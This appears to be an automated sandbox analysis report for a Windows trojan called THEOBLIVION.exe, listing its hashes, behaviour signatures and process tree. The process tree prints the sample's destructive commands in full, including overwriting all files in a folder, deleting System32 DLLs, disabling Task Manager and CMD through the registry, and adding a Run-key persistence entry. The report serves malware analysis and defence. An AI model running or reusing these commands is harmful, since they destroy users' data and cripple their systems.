Overview

overview

8

Static

static

3

THEOBLIVION.exe

windows7-x64

8

Analysis

  • max time kernel
    43s
  • max time network
    18s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    24/12/2023, 08:46

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    THEOBLIVION.exe

  • Size

    62KB

  • MD5

    127c972a4b56f6d758c62f28466cb668

  • SHA1

    d28b8f2022cba3ab04fd65c6c654665021292e27

  • SHA256

    5bf48ebf613570fd9a882058e5d62dd04b370f4173568faaa8b403be4dd4ed92

  • SHA512

    fd3830fa8302931242836a3b53d897a783b0a5a8a4edfa0b7964602dc90aa7c3fe078a2beea48d0a7e38e4a7a31c6f8a78262e6b39ae6a086354fa51fb2d534f

  • SSDEEP

    768:jt1zj0EbAtvGMvIFG1fkh1o7GZ4kzreNTaCyaboOAd38pXj6xQ+VnRJM:j0EyvM6iB3GdZ1j6xQ+VI

Score
8/10
evasionpersistenceransomware

Malware Config

Signatures

  • Disables Task Manager via registry modification
    evasion
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Windows directory 3 IoCs
  • Modifies registry key 1 TTPs 5 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\THEOBLIVION.exe
    "C:\Users\Admin\AppData\Local\Temp\THEOBLIVION.exe"
    1⤵
    • Drops file in Windows directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3044
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c for %a in (*.*) do ( echo OBLIVION--SAY.GOODBYE.TO.YOUR.FILES > %a )
      2⤵
        PID:3056
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c cd C:\Windows\System32 && for %a in (api*.dll) do ( del /f %a )
        2⤵
          PID:2852
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c move "C:\Users\Admin\AppData\Local\Temp\THEOBLIVION.exe" "C:\Windows"
          2⤵
          • Suspicious behavior: RenamesItself
          PID:3012
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v LegalNoticeCaption /t REG_SZ /d "O B L I V I O N V1" > nul 2>&1
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2660
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v LegalNoticeCaption /t REG_SZ /d "O B L I V I O N V1"
            3⤵
              PID:2668
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v LegalNoticeText /t REG_SZ /d "OBLIVION TROJAN -- YOUR COMPUTER IS NO MORE!!!! :-)" > nul 2>&1
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2308
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v LegalNoticeText /t REG_SZ /d "OBLIVION TROJAN -- YOUR COMPUTER IS NO MORE!!!! :-)"
              3⤵
                PID:3004
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c reg add "HKCU\Control Panel\Desktop" /f /v Wallpaper /t REG_SZ /d "C:\Windows\inf\tHeOblIVIOn.bmp" > nul 2>&1
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2652
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKCU\Control Panel\Desktop" /f /v Wallpaper /t REG_SZ /d "C:\Windows\inf\tHeOblIVIOn.bmp"
                3⤵
                • Sets desktop wallpaper using registry
                PID:1908
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c reg add "HKCU\Control Panel\Desktop" /f /v WallpaperStyle /t REG_SZ /d 2 > nul 2>&1
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2840
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKCU\Control Panel\Desktop" /f /v WallpaperStyle /t REG_SZ /d 2
                3⤵
                  PID:2832
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Policies\Microsoft\Windows\System /f /v DisableCMD /t REG_DWORD /d 2 > nul 2>&1
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2908
                • C:\Windows\SysWOW64\reg.exe
                  reg add HKCU\Software\Policies\Microsoft\Windows\System /f /v DisableCMD /t REG_DWORD /d 2
                  3⤵
                  • Modifies registry key
                  PID:2564
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 1 > nul 2>&1
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2560
                • C:\Windows\SysWOW64\reg.exe
                  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 1
                  3⤵
                  • Modifies registry key
                  PID:292
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /f /v NoRun /t REG_DWORD /d 1 > nul 2>&1
                2⤵
                  PID:2672
                  • C:\Windows\SysWOW64\reg.exe
                    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /f /v NoRun /t REG_DWORD /d 1
                    3⤵
                    • Modifies registry key
                    PID:2844
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableLUA /t REG_DWORD /d 0 > nul 2>&1
                  2⤵
                    PID:2648
                    • C:\Windows\SysWOW64\reg.exe
                      reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableLUA /t REG_DWORD /d 0
                      3⤵
                      • Modifies registry key
                      PID:1616
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /f /v 0BL1V10N /t REG_SZ /d "C:\Windows\inf\HAHAHA.vbs" > nul 2>&1
                    2⤵
                      PID:2540
                      • C:\Windows\SysWOW64\reg.exe
                        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /f /v 0BL1V10N /t REG_SZ /d "C:\Windows\inf\HAHAHA.vbs"
                        3⤵
                        • Adds Run key to start application
                        • Modifies registry key
                        PID:2548
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c ping 127.0.0.1 -w 200 -n 2 > nul 2>&1
                      2⤵
                        PID:2568
                        • C:\Windows\SysWOW64\PING.EXE
                          ping 127.0.0.1 -w 200 -n 2
                          3⤵
                          • Runs ping.exe
                          PID:2128
                    • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
                      "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\Desktop\WritePing.doc"
                      1⤵
                        PID:1620

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Temp\ASPNETSetup_00001.log
                        Filesize

                        39B

                        MD5

                        8967cf33fbda2b00aff6b2ef95ec80ac

                        SHA1

                        b4fea1bd06c1f192a53e151bef442046569dff3b

                        SHA256

                        564c94b59be33f32b2b4130c95e821a476d01ae2eb608a436c8b697409b6b24c

                        SHA512

                        a28f23481c1dd3ead4ccd97224c3347f50ae31ccb06971ef7f027eeb02f7140c2fb6155cc5a9aef3691b454ae48871f8ae2a2d7811f2df5095661b9d9f7febb0

                        Download Submit

                      • memory/1620-36-0x000000002FC11000-0x000000002FC12000-memory.dmp

                        Filesize

                        4KB

                        Download